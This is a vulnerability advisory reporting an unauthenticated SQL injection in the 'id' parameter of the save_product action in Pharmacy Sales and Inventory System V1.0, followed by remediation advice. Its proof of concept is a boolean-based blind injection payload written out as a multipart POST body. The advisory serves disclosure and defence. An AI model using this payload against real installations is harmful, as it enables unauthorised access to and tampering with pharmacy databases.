# Vulnerability Summary: SQL Injection in Pharmacy Sales and Inventory System V1.0 ## Vulnerability Overview * **Affected Product**: Pharmacy Sales and Inventory System V1.0 * **Vulnerability Type**: SQL Injection * **Vulnerable File**: `/ajax.php?action=save_product` * **Vulnerable Parameter**: `id` * **Exploitation Conditions**: No authentication or authorization required. * **Root Cause**: Attackers can inject malicious code into the `id` parameter, which is then used directly in SQL queries without proper sanitization or validation. ## Impact Scope * Attackers can gain unauthorized access to the database. * Leakage of sensitive data. * Data tampering. * Full control over the system. * Service disruption. ## Vulnerability Details and POC * **Type**: Boolean-based blind SQL injection * **Payload**: ```text --- Parameter: MULTIPART id ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: -----------------3738858121816587200387936454 Content-Disposition: form-data; name="id" (SELECT (CASE WHEN (7479=7479) THEN '1' ELSE (SELECT 5203 UNION SELECT 7749) END)) -----------------3738858121816587200387936454 Content-Disposition: form-data; name="name" 1111 -----------------3738858121816587200387936454--- ``` ## Remediation 1. **Use Prepared Statements and Parameterized Queries**: Prepared statements prevent SQL injection by separating SQL code from user input data. When using prepared statements, user input values are treated as pure data and are not interpreted as SQL code. 2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize Database User Privileges**: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for routine operations. 4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and fix potential security vulnerabilities.